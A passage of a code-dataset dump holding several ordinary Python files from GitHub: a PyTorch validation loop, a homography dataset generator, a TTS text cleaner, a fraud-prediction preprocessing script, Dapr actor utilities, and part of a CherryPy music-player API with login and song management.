data['mask'].to(device, dtype=torch.long)\n token_type_ids = data['token_type_ids'].to(device, dtype=torch.long)\n targets = data['targets'].to(device, dtype=torch.float)\n outputs = model(ids, mask, token_type_ids)\n loss = loss_fun(outputs, targets)\n epoch_loss = loss.item()\n val_targets.extend(targets.cpu().detach().numpy().tolist())\n val_outputs.extend(torch.sigmoid(outputs).cpu().detach().numpy().tolist())\n\n return print_metrics(val_targets,val_outputs, epoch_loss,'Validation')","repo_name":"skshashankkumar41/Subtheme-Sentiments","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"31760966653","text":"import pickle\nimport helpers\nfrom glob import glob\nfrom matplotlib import pyplot as plt\nimport cv2\nimport random\nimport numpy as np\nfrom numpy.linalg import inv\n\n# hyperparameters\nrho = 32\npatch_size = 128\nheight = 240\nwidth = 320\nvisualize = False\nnum_examples = 1000\n\nloc_list = glob(\"./ms_coco_test_images/*.jpg\")\nX = np.zeros((128, 128, 2, num_examples)) # images\nY = np.zeros((4, 2, num_examples))\nfor i in range(num_examples):\n if i % 100 == 0:\n print(\"Created \", i, \" examples.\")\n # select random image from tiny training set\n index = random.randint(0, 9)\n img_file_location = loc_list[index]\n color_image = plt.imread(img_file_location)\n color_image = cv2.resize(color_image, (width, height))\n gray_image = cv2.cvtColor(color_image, cv2.COLOR_RGB2GRAY)\n\n # create random point P within appropriate bounds\n y = random.randint(rho, height - rho - patch_size) # row?\n x = random.randint(rho, width - rho - patch_size) # col?\n # define corners of image patch\n top_left_point = (x, y)\n bottom_left_point = (patch_size + x, y)\n bottom_right_point = (patch_size + x, patch_size + y)\n top_right_point = (x, patch_size + y)\n four_points = [top_left_point, bottom_left_point, bottom_right_point, top_right_point]\n perturbed_four_points = []\n for point in four_points:\n perturbed_four_points.append((point[0] + 
random.randint(-rho, rho), point[1] + random.randint(-rho, rho)))\n\n    # compute H\n    H = cv2.getPerspectiveTransform(np.float32(four_points), np.float32(perturbed_four_points))\n    H_inverse = inv(H)\n    inv_warped_image = cv2.warpPerspective(gray_image, H_inverse, (320, 240))\n    warped_image = cv2.warpPerspective(gray_image, H, (320, 240))\n\n    # grab image patches\n    original_patch = gray_image[y:y + patch_size, x:x + patch_size]\n    warped_patch = inv_warped_image[y:y + patch_size, x:x + patch_size]\n    # make into dataset\n    training_image = np.dstack((original_patch, warped_patch))\n    H_four_points = np.subtract(np.array(perturbed_four_points), np.array(four_points))\n    X[:, :, :, i] = training_image\n    Y[:, :, i] = H_four_points\n\n    if visualize:\n        plt.figure(figsize=(40, 20))\n        # visualize patches on color image\n        patches_visualization = color_image.copy()\n        cv2.polylines(patches_visualization, np.int32([perturbed_four_points]), 1, (0, 0, 255))\n        cv2.polylines(patches_visualization, np.int32([four_points]), 1, (255, 0, 0))\n        helpers.show_image((2, 2, 1), \"ORIGINAL IMAGE\", patches_visualization)\n        # visualize patch on warped image\n        patch_warped_visualization = inv_warped_image.copy()\n        cv2.polylines(patch_warped_visualization, np.int32([four_points]), 1, (0, 0, 0))\n        helpers.show_image((2, 2, 2), \"WARPED IMAGE\", patch_warped_visualization)\n        # visualize patch itself\n        helpers.show_image((2, 2, 3), \"ORIGINAL PATCH\", original_patch)\n        # visualize warped patch itself\n        helpers.show_image((2, 2, 4), \"WARPED PATCH\", warped_patch)\n        plt.show()\n        plt.close()\nprint(\"Saving in pickle format.\")\n# examples are stacked along the last axis, so split the train/validation sets there\nX_train = X[:, :, :, 0:int(0.9 * num_examples)]\nX_valid = X[:, :, :, int(0.9 * num_examples):]\nY_train = Y[:, :, 0:int(0.9 * num_examples)]\nY_valid = Y[:, :, int(0.9 * num_examples):]\ntrain = {'features': X_train, 'labels': Y_train}\nvalid = {'features': X_valid, 'labels': Y_valid}\npickle.dump(train, open(\"train.p\", \"wb\"))\npickle.dump(valid, open(\"valid.p\", \"wb\"))\nprint(\"Done.\")\n","repo_name":"alexhagiopol/deep_homography_estimation","sub_path":"generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"8"} +{"seq_id":"43427224867","text":"import inflect\nimport re\nimport unidecode\nimport json\nimport string\n\np = inflect.engine()\n\n\ndef printable_only(text: str) -> str:\n    \"\"\"_Removes crap characters that don't play nicely with things like TTS processors._\n\n    Args:\n        text (str): _Takes a string that needs to be cleaned._\n\n    Returns:\n        str: _Returns only printable characters in the form of a string after creating an iterable that is then rejoined after filtering._\n    \"\"\"\n    printable = set(string.printable)\n    return \"\".join(filter(lambda x: x in printable, text))\n\n\ndef raw_list_from_file(text_path: str) -> list:\n    \"\"\"Pulls text from a file and returns it as a list.\n\n    Args:\n        text_path (str): The path of the text file.\n\n    Returns:\n        list: A list of lines to be cleaned.\n    \"\"\"\n    line_list = []\n\n    with open(text_path, \"r\", encoding=\"utf-8\") as f:\n        for line in f:\n            line_list.append(line)\n\n    return line_list\n\n\ndef clean_years_l(line_list: list, inf_eng: inflect.engine) -> list:\n    \"\"\"Transforms all years from numerals to words.\n\n    Args:\n        line_list (list): _description_\n        inf_eng (inflect.engine): _description_\n\n    Returns:\n        list: Returns a cleaned list of the line_list argument.\n    \"\"\"\n    for idx, line in enumerate(line_list):\n        
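# match 4-digit runs bounded by non-digits so only year-like numbers are caught\n        results = 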
re.findall(\"(\D)(\d{4})(\D)\", line)\n        for result in results:\n            year_change = re.sub(\n                \"-oh-oh\",\n                \"-hundred\",\n                re.sub(\n                    \"oh\s\",\n                    \"oh-\",\n                    re.sub(\n                        \",\s\", \"-\", inf_eng.number_to_words(result[1], group=2, zero=\"oh\")\n                    ),\n                ),\n            )\n            single_years = [\n                \"one\",\n                \"two\",\n                \"three\",\n                \"four\",\n                \"five\",\n                \"six\",\n                \"seven\",\n                \"eight\",\n                \"nine\",\n            ]\n            for year in single_years:\n                if year_change[:6] == \"twenty\":\n                    year_change = re.sub(\n                        f\"twenty-oh-{year}\", f\"two-thousand-and-{year}\", year_change\n                    )\n                else:\n                    year_change = re.sub(\n                        f\"oh-{year}\", f\"hundred-and-{year}\", year_change\n                    )\n            line_list[idx] = re.sub(result[1], year_change, line_list[idx])\n    return line_list\n\n\ndef clean_numbers_l(line_list: list, inf_eng: inflect.engine) -> list:\n    \"\"\"Turns all non-year numbers into words.\n\n    Args:\n        line_list (list): _description_\n        inf_eng (inflect.engine): _description_\n\n    Returns:\n        list: _Returns a cleaned list of the line_list argument._\n    \"\"\"\n\n    for idx, line in enumerate(line_list):\n        result = re.findall(\"(\d+)\", line)\n        for found_num in result:\n            # spell out each matched number and replace only its first occurrence\n            repl = inf_eng.number_to_words(found_num, andword=\" and\")\n            line = re.sub(found_num, repl, line, count=1)\n        line_list[idx] = unidecode.unidecode(line)\n    return line_list\n\n\ndef to_file(text_list: list, dest_path: str) -> None:\n    \"\"\"\n    Writes the cleaned text to a file.\n    \"\"\"\n    with open(dest_path, \"w+\", encoding=\"utf-8\") as f:\n        for line in text_list:\n            f.write(line)\n\n\ndef to_json(text_list: list, dest_path: str) -> None:\n    \"\"\"\n    Writes the cleaned text to a json file.\n    \"\"\"\n\n    list_container = {\"text_list\": []}\n\n    for line in text_list:\n        list_container[\"text_list\"].append(line)\n\n    with open(dest_path, \"w+\", encoding=\"utf-8\") as f:\n        json.dump(list_container, f, indent=4)\n\ndef clean_titles(text_list:list)->list:\n    title_list = []\n    title_clean_top = 0\n    title_clean_mid = 0\n    for idx, line in enumerate(text_list):\n        if line.isupper():\n            title_list.append(line)\n        if len(title_list) == 2:\n            title_clean_mid = idx\n            title_clean_top = idx-2\n        if len(title_list) == 3:\n            text_list[idx] = \" \".join(title_list)\n            title_list = []\n            text_list.remove(text_list[title_clean_mid])\n            text_list.remove(text_list[title_clean_top])\n    return text_list\n\ndef last_pass(text_list: str, dest_path: str) -> None:\n    \"\"\"_Cleans the text_list argument of unprintable and unwanted characters then writes it to a file._\n\n    Args:\n        text_list (str): _The list of text lines to be cleaned_\n        dest_path (str): _The path of the output file including the file name and extension._\n    \"\"\"\n    final_lines = []\n    for line in text_list:\n        line = re.sub(\"\s+\", \" \", line)\n        line = re.sub(\"\n\", \"\", line)\n        line = re.sub(\"\r\", \"\", line)\n        line = re.sub(\"\t\", \"\", line)\n        line = \"\".join([line, \"\n\"])\n        final_lines.append(printable_only(line))\n    to_file(final_lines, dest_path)\n\n\nif __name__ == \"__main__\":\n\n    def main(text_path: str, dest_path: str, inf_eng: inflect.engine):\n        \"\"\"_Cleans the text_path argument and writes it to a file._\"\"\"\n        last_pass(\n            clean_titles(\n                clean_numbers_l(\n                    clean_years_l(raw_list_from_file(text_path), inf_eng), inf_eng\n                ),\n            ),\n            dest_path,\n        )\n\n
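    # run the whole pipeline: read the raw lines, spell out years and numbers, merge split titles, write the result\n    main(\"text_files/origin_text.txt\", \"text_files/clean.txt\", 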
p)\n","repo_name":"TheLustriVA/ttsMetaClean","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"36597775025","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport pandas as pd\nimport numpy as np\nimport pickle\n\n\ndef clean_json(df):\n    \"\"\" Summary: Take in a pandas DataFrame from json and prepare it for model prediction.\n    INPUT: Pandas DataFrame: DataFrame of imported json.\n    OUTPUT: Pandas DataFrame: DataFrame after it has been prepared for the model.\n    \"\"\"\n\n    df.drop('description', inplace=True, axis=1)\n\n    # Fraud defined as anything that isn't premium\n    #df['fraud'] = np.where(df.acct_type == \"premium\", False, True)\n\n    # Strip out the value after the final period\n    df['email_domain_ending'] = df['email_domain'].apply(lambda x: x.split('.')[-1].lower().strip() )\n\n    # Required step: clean domain ending for future data\n    #temp = pd.crosstab(df['email_domain_ending'], df['fraud'])\n\n    #temp.rename(columns={False:\"FALSE\", True:\"TRUE\"}, inplace=True)\n    temp = df.copy(deep=True)\n    if \"TRUE\" not in temp.columns:\n        temp[\"TRUE\"] = 0\n    if \"FALSE\" not in temp.columns:\n        temp[\"FALSE\"] = 0\n    temp.reset_index(inplace=True)\n    temp['email_domain_ending'] = np.where(temp[\"FALSE\"] + temp[\"TRUE\"] <= 10, 'other', temp.email_domain_ending)\n    acceptable_domain_endings = set(temp['email_domain_ending'])\n\n    df['email_domain_ending'] = df['email_domain_ending'].apply(lambda x: x if x in acceptable_domain_endings else \"other\")\n\n    # Whether or not the user input a venue_name\n    df['has_venue'] = np.where(pd.isnull(df.venue_name), False, True)\n\n    # Remove unused columns\n    df = df[['body_length', 'email_domain_ending', 'user_age', 'has_venue']]\n\n    # Create dummies for email_domain_ending\n    df_domain = pd.get_dummies(df['email_domain_ending'])\n    frames = [df, df_domain]\n    df = pd.concat(frames, axis=1)\n    df = df.drop('email_domain_ending', axis=1)\n\n    # Ensure the columns match those the model expects.\n    # This is primarily for dummies not being present. \n    cols = pickle.load(open(\"models/model_columns.pkl\", \"rb\"))\n    for col in cols[cols != 'fraud']:\n        if col not in df.columns:\n            df[col] = 0\n\n    return df\n\n\ndef get_json(json_path = \"test_script_examples.json\"):\n    \"\"\" Summary: Read in json file with test examples to predict.\n    INPUT: string: Path to json file to read in.\n    OUTPUT: Pandas DataFrame: DataFrame of the raw json.\n    \"\"\"\n\n    return pd.read_json(json_path)\n\n\ndef get_model(model_path = \"models/model.pkl\"):\n    \"\"\" Summary: Load a pickled sklearn model.\n    INPUT: string: Path to pickled model.\n    OUTPUT: Sklearn Model: Model we will use for prediction.\n    \"\"\"\n    return pickle.load(open(model_path, \"rb\"))\n\n\ndef get_predictions(df, model):\n    \"\"\" Summary: Produce predictions with probabilities of each label.\n    INPUT: Pandas DataFrame: DataFrame of prepared test examples to evaluate.\n           Sklearn model: Model to perform predictions.\n    OUTPUT: Predicted probabilities of each class for each example read. 
\n    \"\"\"\n    return model.predict_proba(df)\n\n\n\nif __name__ == \"__main__\":\n    test_df = get_json()\n    test_df = clean_json(test_df)\n    #model = get_model()\n    #predictions = get_predictions(test_df, model)\n    #print predictions\n\n","repo_name":"clemriedel/ds4all","sub_path":"pipeline/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"} +{"seq_id":"22021044317","text":"from typing import Any, Dict, List, Type\n\nfrom dapr.actor.actor_interface import ActorInterface\nfrom dapr.actor.runtime.actor import Actor\n\n\ndef get_class_method_args(func: Any) -> List[str]:\n    args = func.__code__.co_varnames[:func.__code__.co_argcount]\n\n    # Exclude self, cls arguments\n    if args and (args[0] == 'self' or args[0] == 'cls'):\n        args = args[1:]\n    return list(args)\n\n\ndef get_method_arg_types(func: Any) -> List[Type]:\n    annotations = getattr(func, '__annotations__')\n    args = get_class_method_args(func)\n    arg_types = []\n    for arg_name in args:\n        arg_type = object if arg_name not in annotations else annotations[arg_name]\n        arg_types.append(arg_type)\n    return arg_types\n\n\ndef get_method_return_types(func: Any) -> Type:\n    annotations = getattr(func, '__annotations__')\n    # fall back to object when no return annotation is present\n    if not annotations.get('return'):\n        return object\n    return annotations['return']\n\n\ndef get_dispatchable_attrs_from_interface(\n        actor_interface: Type[ActorInterface],\n        dispatch_map: Dict[str, Any]) -> None:\n    for attr, v in actor_interface.__dict__.items():\n        if attr.startswith('_') or not callable(v):\n            continue\n        actor_method_name = getattr(v, '__actormethod__') if hasattr(v, '__actormethod__') else attr\n\n        dispatch_map[actor_method_name] = {\n            'actor_method': actor_method_name,\n            'method_name': attr,\n            'arg_names': get_class_method_args(v),\n            'arg_types': get_method_arg_types(v),\n            'return_types': get_method_return_types(v)\n        }\n\n\ndef get_dispatchable_attrs(actor_class: Type[Actor]) -> Dict[str, Any]:\n    \"\"\"Gets the list of dispatchable attributes from actor.\n\n    Args:\n        actor_class (type): The actor object which inherits :class:`ActorInterface`\n\n    Returns:\n        Dict[str, Any]: The map from attribute to actor method.\n\n    Raises:\n        ValueError: `actor_class` doesn't inherit :class:`ActorInterface`.\n    \"\"\"\n    # Find all user actor interfaces derived from ActorInterface\n    actor_interfaces = get_actor_interfaces(actor_class)\n    if len(actor_interfaces) == 0:\n        raise ValueError(f'{actor_class.__name__} has not inherited from ActorInterface')\n\n    # Find all dispatchable attributes\n    dispatch_map: Dict[str, Any] = {}\n    for user_actor_cls in actor_interfaces:\n        get_dispatchable_attrs_from_interface(user_actor_cls, dispatch_map)\n\n    return dispatch_map\n\n\ndef is_dapr_actor(cls: Type[Actor]) -> bool:\n    \"\"\"Checks if class inherits :class:`Actor`.\n\n    Args:\n        cls (type): The Actor implementation.\n\n    Returns:\n        bool: True if cls inherits :class:`Actor`. 
Otherwise, False\n \"\"\"\n return issubclass(cls, Actor)\n\n\ndef get_actor_interfaces(cls: Type[Actor]) -> List[Type[ActorInterface]]:\n \"\"\"Gets the list of the base classes that inherits :class:`ActorInterface`.\n\n Args:\n cls (:class:`Actor`): The Actor object that inherit :class:`Actor` and\n :class:`ActorInterfaces`.\n\n Returns:\n List: the list of classes that inherit :class:`ActorInterface`.\n \"\"\"\n actor_bases = []\n for cl in cls.mro():\n if ActorInterface in cl.__bases__:\n actor_bases.append(cl)\n\n return actor_bases\n","repo_name":"dapr/python-sdk","sub_path":"dapr/actor/runtime/_type_utils.py","file_name":"_type_utils.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"8"} +{"seq_id":"25646526617","text":"#!/usr/bin/env python3\n\nfrom __future__ import unicode_literals\n\nimport cherrypy\nimport os\nimport threading\nimport glob\nimport zipfile\nimport shutil\nimport pymongo as pm\nimport functools\nimport time\n\nfrom bson.objectid import ObjectId\nfrom io import BytesIO\nfrom uuid import uuid4\n\nimport music_player.utils as m_utils\n\nfrom datetime import datetime, timedelta\n\nimport youtube_dl\nimport eyed3\n\nfrom http import cookiejar\nimport requests\nfrom selectolax.parser import HTMLParser\n#from stackoverflow.com/questions/17037668/how-to-disable-cookie-handling-with-the-python-requests-library\nclass BlockAll(cookiejar.CookiePolicy):\n\treturn_ok = set_ok = domain_return_ok = path_return_ok = lambda self, *args, **kwargs: False\n\tnetscape = True\n\trfc2965 = hide_cookie2 = False\n\nabsDir = os.getcwd()\nplaylistFields = [\"_id\", \"date\", \"dateStr\", \"contents\", \"name\"]\nmusicFields = [\"_id\", \"url\", \"type\", \"vol\", \"name\", \"artist\", \"start\", \"end\"]\n\nDOWNLOAD_FOLDER = \"download\"\ndownloadThreads = {}\navgDelay = 75\t\t\t\t\t#expect about 75 ms to execute per second of the video\nalpha = 0.5\t\t\t\t\t\t#alpha for exponential moving average; closer to 1 means recent observations have more weight\nnetworkDelay = 500\t\t\t\t#expect 500ms between client and server\ndownloadUIDFolders = {}\t\t\t#holds UID: time served\ndownloadCleanupDelay = 5 * 60\t#wait 5 minutes before attempting to cleanup\n\n# interrupted = False\n# def signal_handler(signal, frame):\n# \tglobal interrupted\n# \tinterrupted = True\n# import signal\n# signal.signal(signal.SIGINT, signal_handler)\n\nimport signal\n\nexit = threading.Event()\ndef quit(signo, _frame):\n\tprint(\"Interrupt caught, shutting down\")\n\texit.set()\n\tcherrypy.engine.exit()\n\nfor sig in (\"TERM\", \"HUP\", \"INT\"):\n\tsignal.signal(getattr(signal, \"SIG\" + sig), quit)\n\ndef authUser(func):\n\t'''\n\tVerify user is logged in; redirect if not\n\t'''\n\t@functools.wraps(func)\n\tdef decorated_function(*args, **kwargs):\n\t\tuser = cherrypy.session.get('name', None)\n\n\t\t# no user means force a login\n\t\tif user is None:\n\t\t\t# raise cherrypy.HTTPRedirect('/login')\n\t\t\t# raise cherrypy.HTTPRedirect('/')\n\t\t\traise cherrypy.HTTPError(403, \"Not logged in\")\n\t\treturn func(*args, **kwargs)\n\n\treturn decorated_function\n\n\t# return decorator\n\nclass ApiGateway(object):\n\n\tdef __init__(self):\n\t\tclient = pm.MongoClient()\n\t\tself.db = client['music']\n\t\t# self.colArtist = db[\"artists\"]\t#this will be shared across users; same with genres: albums will be personal\n\t\t# self.colMusic = db['music']\n\t\t# self.colPlaylists = db['playlists']\n\t\tself.colUsers = 
self.db['users']\n\t\tself.colLast = self.db[\"lastPlay\"]\n\t\t# cleanupDownloadThread = threading.Thread(target=self.cleanupDownloads)\n\t\t# cleanupDownloadThread.start()\n\n\t@authUser\n\tdef getUser(self):\n\t\treturn cherrypy.session.get(\"name\")\n\n\t@authUser\n\tdef musicDB(self):\n\t\t# user = cherrypy.session.get(\"name\")\n\t\treturn self.db[self.getUser() + \"-music\"]\n\n\t@authUser\n\tdef playlistDB(self):\n\t\t# user = cherrypy.session.get(\"name\")\n\t\treturn self.db[self.getUser() + \"-playlist\"]\n\n\t# @authUser\n\t# def lastDB(self):\n\t# \t# user = cherrypy.session.get(\"name\")\n\t# \treturn self.db[self.getUser() + \"-last\"]\n\n\t# API Functions go below. DO EXPOSE THESE\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\tdef doLogin(self):\n\t\t\"\"\"\n\t\tLogs the user into the system\n\n\t\tExpected input:\n\n\t\t\t{\n\t\t\t\t\"username\": (string),\n\t\t\t\t\"password\": (string)\n\t\t\t}\n\t\t\"\"\"\n\t\tif hasattr(cherrypy.request, \"json\"):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, \"No data was given\")\n\n\t\tfor k in [\"username\", \"password\"]:\n\t\t\tm_utils.checkValidData(k, data, str)\n\t\tuser = self.colUsers.find_one({\"username\": data[\"username\"]})\n\t\tif user is not None and m_utils.verifyUser(user, data[\"password\"]):\n\t\t\t#set the session name\n\t\t\tcherrypy.session[\"name\"] = data[\"username\"]\n\t\t\treturn\n\t\telse:\n\t\t\traise cherrypy.HTTPError(403, \"Invalid login credentials\")\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\tdef changePassword(self):\n\t\t\"\"\"\n\t\tChanges the password for a user\n\n\t\tExpected input:\n\n\t\t\t{\n\t\t\t\t\"username\": (string),\n\t\t\t\t\"old\": (string),\n\t\t\t\t\"new\": (string)\n\t\t\t}\n\t\t\"\"\"\n\t\tif hasattr(cherrypy.request, \"json\"):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, \"No data was given\")\n\n\t\tfor k in [\"username\", \"old\", \"new\"]:\n\t\t\tm_utils.checkValidData(k, data, str)\n\t\tuser = self.colUsers.find_one({\"username\": data[\"username\"]})\n\t\tif user is not None:\n\t\t\tnewHash, newSalt = m_utils.changePassword(user, data[\"old\"], data[\"new\"])\n\t\t\tself.colUsers.update_one({\"username\": data[\"username\"]}, {\"$set\": {\"hash\": newHash, \"salt\": newSalt}})\n\t\t\treturn\n\t\telse:\n\t\t\traise cherrypy.HTTPError(403, \"Invalid login credentials\")\n\n\t@cherrypy.expose\n\t@authUser\n\tdef logout(self):\n\t\t\"\"\"\n\t\tLogs user out of system\n\t\t\"\"\"\n\t\tprint(\"LOGGING OUT\");\n\t\tcherrypy.lib.sessions.expire()\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef addMusic(self):\n\t\t\"\"\"\n\t\tAdd a song to the database\n\n\t\tExpected input:\n\n\t\t\t{\n\t\t\t\t\"url\": (string),\n\t\t\t\t\"type\": (string) (\"youtube\" or \"mp3\"),\t//TODO: add other sources\n\t\t\t\t\"vol\": (int) (0-100),\n\t\t\t\t\"name\": (string),\n\t\t\t\t\"artist\": [(string)],\n\t\t\t\t\"album\": (string),\n\t\t\t\t\"genre\": (string),\n\t\t\t\t\"start\": (int) (in seconds),\n\t\t\t\t\"end\": (int) (number of seconds from the end of video to stop)\n\t\t\t}\n\n\t\tReturns::\n\n\t\t\tAdded MongoDB object\n\n\t\t:return: the MongoDB object\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tmyRequest = m_utils.createMusic(data, 
self.musicDB())\n\t\tmyRequest[\"date\"] = datetime.now()\n\n\t\t# insert the data into the database\n\t\tinserted = self.musicDB().insert(myRequest)\n\n\t\t#TODO: check if the artist exists; add if DNE\n\t\t# for artist in myRequest[\"artist\"]:\n\t\t# \tif (len(list(self.colArtist.find({\"name\": artist}).limit(1))) == 0):\n\t\t# \t\tself.colArtist.insert_one({\"name\": artist})\n\n\t\tmyRequest[\"_id\"] = str(inserted)\n\t\treturn m_utils.cleanRet(myRequest)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef addManyMusic(self):\n\t\t\"\"\"\n\t\tAdd many songs to the database\n\n\t\tExpected input:\n\n\t\t\t[{\n\t\t\t\t\"url\": (string),\n\t\t\t\t\"type\": (string) (\"youtube\" or \"mp3\"),\t//TODO: add other sources\n\t\t\t\t\"vol\": (int) (0-100),\n\t\t\t\t\"name\": (string),\n\t\t\t\t\"artist\": [(string)],\n\t\t\t\t\"album\": (string),\n\t\t\t\t\"genre\": (string),\n\t\t\t\t\"start\": (int) (in seconds),\n\t\t\t\t\"end\": (int) (number of seconds from the end of video to stop)\n\t\t\t},\n\t\t\t...]\n\n\t\tReturns::\n\n\t\t\t[{}, ...]\n\n\t\t:return: a list containing the inserted objects\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tmyRequest = [];\n\t\tif not isinstance(data, list) or len(data) == 0:\n\t\t\traise cherrypy.HTTPError(400, \"Invalid data given\")\n\t\tfor song in data:\n\t\t\tif not isinstance(song, dict):\n\t\t\t\traise cherrypy.HTTPError(400, \"Invalid song data given\")\n\t\t\treqSong = m_utils.createMusic(song, self.musicDB())\n\t\t\treqSong[\"date\"] = datetime.now()\n\n\t\t\t# insert the data into the database\n\t\t\tmyRequest.append(reqSong)\n\t\t\t# print(reqSong)\n\n\t\t\t#TODO: check if the artist exists; add if DNE\n\t\t\t# for artist in reqSong[\"artist\"]:\n\t\t\t# \tif (len(list(self.colArtist.find({\"name\": artist}).limit(1))) == 0):\n\t\t\t# \t\tself.colArtist.insert_one({\"name\": artist})\n\n\t\t\t# reqSong[\"_id\"] = str(inserted)\n\t\t# return m_utils.cleanRet(myRequest)\n\t\tinserted = self.musicDB().insert_many(myRequest)\t#this is ordered by default\n\t\tfor i, song in enumerate(myRequest):\n\t\t\tmyRequest[i][\"_id\"] = inserted.inserted_ids[i]\n\t\t# print(myRequest)\n\t\treturn m_utils.cleanRet(myRequest)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef findMusic(self):\n\t\t\"\"\"\n\t\tReturns a list of songs matching the query presented; limits to 25\n\n\t\tExpected input (no field present -> return all):\n\t\t\t{\n\t\t\t\t\"url\": [(string)],\n\t\t\t\t\"type\": [(string)],\n\t\t\t\t\"song_names\": [(string)],\n\t\t\t\t\"artist_names\": [(string)],\n\t\t\t\t\"album_names\": [(string)],\n\t\t\t\t\"genre_names\": [(string)],\n\t\t\t\t\"start_date\": (datetime),\n\t\t\t\t\"end_date\": (datetime),\n\t\t\t\t\"_id\": [(string)],\n\t\t\t\t\"sortby\": (string, default \"date\", [\"date\", \"relev\", \"name\"]),\n\t\t\t\t\"descend\": (boolean, default True, True=descending),\n\t\t\t\t# \"page\": (integer, default 0)\n\t\t\t}\n\n\t\tReturns: {\n\t\t\t\"results\": [{results}],\n\t\t\t\"count\": (int)\n\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\treturn 
m_utils.makeMusicQuery(data, self.musicDB())\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef findMusicList(self):\n\t\t\"\"\"\n\t\tReturns a list of songs matching the ids specified in a list. To be used in conjunction with playlist contents\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"content\": [(_id)]\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tif \"content\" in data:\n\t\t\t# print(\"finding:\", data[\"content\"])\n\t\t\t# idList = [ObjectId(i) for i in data[\"content\"]]\n\t\t\tidList = [m_utils.checkValidID(i) for i in m_utils.checkValidData(\"content\", data, list)]\n\t\t\t# for x in idList:\n\t\t\t# if not ObjectId.is_valid(x):\n\t\t\t# raise cherrypy.HTTPError(400, \"Bad song id\")\n\t\t\t#return in order requested: from https://stackoverflow.com/questions/22797768/does-mongodbs-in-clause-guarantee-order/22800784\n\t\t\t# stack = []\n\t\t\t# i = len(idList) - 1\n\t\t\t# if i <= 0:\n\t\t\t# \treturn []\n\t\t\t# while i > 0:\n\t\t\t# \trec = {\n\t\t\t# \t\t\"$cond\": [{\n\t\t\t# \t\t\t\"$eq\": [\"$_id\", idList[i - 1]]\n\t\t\t# \t\t},\n\t\t\t# \t\ti]\n\t\t\t# \t}\n\t\t\t# \tif len(stack) == 0:\n\t\t\t# \t\trec[\"$cond\"].append(i + 1)\n\t\t\t# \telse:\n\t\t\t# \t\trec[\"$cond\"].append(stack.pop())\n\t\t\t# \tstack.append(rec)\n\t\t\t# \ti -= 1\n\t\t\t# projectStage = {\"$project\": {\"order\": stack[0]}}\n\t\t\t# for f in musicFields:\n\t\t\t# \tprojectStage[\"$project\"][f] = 1\n\t\t\t# pipeline = [\n\t\t\t# \t{\"$match\": {\"_id\": {\"$in\": idList}}},\n\t\t\t# \t# {\"$project\": {\"order\": stack[0]}},\n\t\t\t# \tprojectStage,\n\t\t\t# \t{\"$sort\": {\"order\": 1}}\n\t\t\t# ]\n\t\t\t# return m_utils.cleanRet(self.colMusic.aggregate(pipeline))\n\t\t\tret = []\n\t\t\tfor i in idList:\n\t\t\t\tres = self.musicDB().find_one({\"_id\": i})\n\t\t\t\tif res == None:\n\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid id in playlist contents\")\n\t\t\t\tret.append(res)\n\t\t\treturn m_utils.cleanRet(ret)\n\t\t\t# return m_utils.cleanRet(list(self.colMusic.find({\"_id\": {\"$in\": data[\"content\"]}})))\n\t\traise cherrypy.HTTPError(400, \"No playlist content data given\")\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef editMusic(self):\n\t\t\"\"\"\n\t\tEdits a list of songs\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"url\": (string) (optional),\n\t\t\t\t\"type\": (string) (optional),\n\t\t\t\t\"name\": (string) (optional),\n\t\t\t\t\"artist\": [(string)] (optional),\n\t\t\t\t\"album\": (string) (optional),\n\t\t\t\t\"genre\": (string) (optional),\n\t\t\t\t\"vol\": (int) (optional),\n\t\t\t\t\"start\": (int) (optional),\n\t\t\t\t\"end\": (int) (optional),\n\t\t\t\t\"_id\": 